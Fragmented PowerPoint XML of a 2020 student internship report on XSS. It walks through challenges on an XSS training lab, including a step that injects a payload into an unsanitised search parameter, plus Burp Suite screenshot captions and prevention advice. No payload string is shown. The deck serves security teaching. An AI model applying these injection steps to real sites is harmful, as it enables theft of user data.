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58" r:id="rId4"/>
    <p:sldId id="259" r:id="rId5"/>
    <p:sldId id="260" r:id="rId6"/>
    <p:sldId id="261" r:id="rId7"/>
    <p:sldId id="262" r:id="rId8"/>
    <p:sldId id="263" r:id="rId9"/>
    <p:sldId id="264" r:id="rId10"/>
    <p:sldId id="265" r:id="rId11"/>
    <p:sldId id="266" r:id="rId12"/>
    <p:sldId id="267" r:id="rId13"/>
    <p:sldId id="272" r:id="rId14"/>
    <p:sldId id="273" r:id="rId15"/>
    <p:sldId id="274" r:id="rId16"/>
    <p:sldId id="276" r:id="rId17"/>
    <p:sldId id="275" r:id="rId18"/>
    <p:sldId id="277" r:id="rId19"/>
    <p:sldId id="280" r:id="rId20"/>
    <p:sldId id="279" r:id="rId21"/>
    <p:sldId id="278" r:id="rId22"/>
    <p:sldId id="281" r:id="rId23"/>
    <p:sldId id="283" r:id="rId24"/>
    <p:sldId id="282" r:id="rId25"/>
    <p:sldId id="284" r:id="rId26"/>
    <p:sldId id="285" r:id="rId27"/>
    <p:sldId id="271" r:id="rId28"/>
    <p:sldId id="26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7" autoAdjust="0"/>
    <p:restoredTop sz="9466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BC534AB-4FFD-4F2E-BF0F-8BFDD596B3D8}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>28-06-2020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AB94DF-E461-4F02-93B9-17CBC5676D01}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="83746985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C534AB-4FFD-4F2E-BF0F-8BFDD596B3D8}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>28-06-2020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AB94DF-E461-4F02-93B9-17CBC5676D01}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4275574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C534AB-4FFD-4F2E-BF0F-8BFDD596B3D8}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>28-06-2020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AB94DF-E461-4F02-93B9-17CBC5676D01}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1718233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C534AB-4FFD-4F2E-BF0F-8BFDD596B3D8}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>28-06-2020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AB94DF-E461-4F02-93B9-17CBC5676D01}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="646629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BC534AB-4FFD-4F2E-BF0F-8BFDD596B3D8}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>28-06-2020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AB94DF-E461-4F02-93B9-17CBC5676D01}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="141903459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BC534AB-4FFD-4F2E-BF0F-8BFDD596B3D8}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>28-06-2020</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AFAB94DF-E461-4F02-93B9-17CBC5676D01}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="122139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BC534AB-4FFD-4F2E-BF0F-8BFDD596B3D8}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>28-06-2020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AB94DF-E461-4F02-93B9-17CBC5676D01}"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0214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C534AB-4FFD-4F2E-BF0F-8BFDD596B3D8}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>28-06-2020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AB94DF-E461-4F02-93B9-17CBC5676D01}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2820512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C534AB-4FFD-4F2E-BF0F-8BFDD596B3D8}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>28-06-2020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AB94DF-E461-4F02-93B9-17CBC5676D01}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="608501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BC534AB-4FFD-4F2E-BF0F-8BFDD596B3D8}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>28-06-2020</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AFAB94DF-E461-4F02-93B9-17CBC5676D01}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2169908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BC534AB-4FFD-4F2E-BF0F-8BFDD596B3D8}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>28-06-2020</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AFAB94DF-E461-4F02-93B9-17CBC5676D01}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34398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BC534AB-4FFD-4F2E-BF0F-8BFDD596B3D8}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>28-06-2020</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FAB94DF-E461-4F02-93B9-17CBC5676D01}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1680693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leettime.net/xsslab1/chalg1.ph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eettime.net/xsslab1/chalg1.ph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leettime.net/xsslab1/chalg1.ph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6000"/>
            <a:lum/>
          </a:blip>
          <a:srcRect/>
          <a:tile tx="0" ty="0" sx="100000" sy="100000" flip="none" algn="tl"/>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8A1336E-75CB-4308-ACCD-919D55055CCE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="204186"/>
            <a:ext cx="9144000" cy="6436311"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="32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XSS VULNERABILITY </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="32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 Based Internship 2020 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="32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Submitted to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3200" b="1"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DataRitz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="32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Technologies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="32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Duration - 6 weeks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="32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By </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="32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Khushi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3200" b="1" dirty="0" err="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Rauniyar</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="32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IN" sz="32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3200" b="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1803213083 </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="32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IN" sz="32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ABES Engineering College </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="32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ABDUL KALAM TECHNICAL UNIVERSITY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="32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(AKTU)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="32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Under the guidance of </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="32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Mr. KRISHNA VIR SINGH</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3501806412"/>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06EF257-B4B3-4256-B62D-2BEA41553E81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="463488" y="346229"/>
            <a:ext cx="11265023" cy="6329778"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" u="sng" dirty="0"/>
              <a:t>Challenge 8</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Type any name in the field provided “ Enter Your Name here” and click on submit button.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>The request has 2 parameters this time one is name other is search and name appears to be sanitized while search is not.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>So enter the payload in the search value and then hit enter.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>The alert will trigger.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" u="sng" dirty="0"/>
              <a:t>Impact </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>The attacker can steal sensitive information by injecting JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>and can take full control of the vulnerable application and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>compromise </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>all users and their data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" u="sng" dirty="0"/>
              <a:t>Prevention-</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Filter input on arrival.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Encode data on output. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Use appropriate response headers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Content Security Policy. </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19414972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F6FB8910-B870-456B-B85F-E6758C69FD37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3542253" y="1201659"/>
            <a:ext cx="4603633" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" u="sng" dirty="0"/>
              <a:t>Burp Suite for challenge 1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{4A32C3B4-C156-4212-B700-C147789B11DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4046109" y="155359"/>
            <a:ext cx="4099777"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Screenshots</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161535" y="1847849"/>
            <a:ext cx="9514703" cy="4701231"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5323367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5A074A0-248E-40BF-95FD-8F16EF659784}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="749643" y="117927"/>
            <a:ext cx="6096000" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" u="sng" dirty="0"/>
              <a:t>Successful completion of challenge 1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" u="sng" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{8C73DC7B-8B62-4F53-808C-24C0E825EA33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3047999" y="3422708"/>
            <a:ext cx="6096000" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1600" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="299078" y="491808"/>
            <a:ext cx="6410448" cy="2957130"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7123573" y="3022598"/>
            <a:ext cx="4040851" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marR="0" lvl="2" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" u="sng" spc="-5" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Burp Suite for challenge 2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" spc="-5" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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5923462" y="3471484"/>
            <a:ext cx="5969458" cy="3225227"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39642097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7400F6F-8109-468E-AD87-188447E3A3E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3426038" y="0"/>
            <a:ext cx="4611775" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" u="sng" dirty="0"/>
              <a:t>Successful completion of challenge 2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{5685FEE9-2EF6-48FF-99C8-46246358E2D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3061329" y="3335724"/>
            <a:ext cx="6986726" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>Successful completion of challenge 3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3061329" y="436746"/>
            <a:ext cx="5341191" cy="2811934"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3186112" y="3781725"/>
            <a:ext cx="5216408" cy="3076275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1395292724"/>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507470C2-3A47-4F91-B4F1-F0A3635F9F71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3644052" y="0"/>
            <a:ext cx="4611775" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" u="sng" dirty="0"/>
              <a:t>Successful completion of challenge 4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{4EB8977D-A219-4A01-B637-B563AC1ED511}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4470040" y="3430720"/>
            <a:ext cx="3688446" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:buSzPts val="1400"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" u="sng" dirty="0"/>
              <a:t>Successful completion of challenge </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>5</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="ctr">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" sz="2000" u="none" strike="noStrike" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3194139" y="528776"/>
            <a:ext cx="5826294" cy="2901944"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3194139" y="3800052"/>
            <a:ext cx="5826293" cy="2901944"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
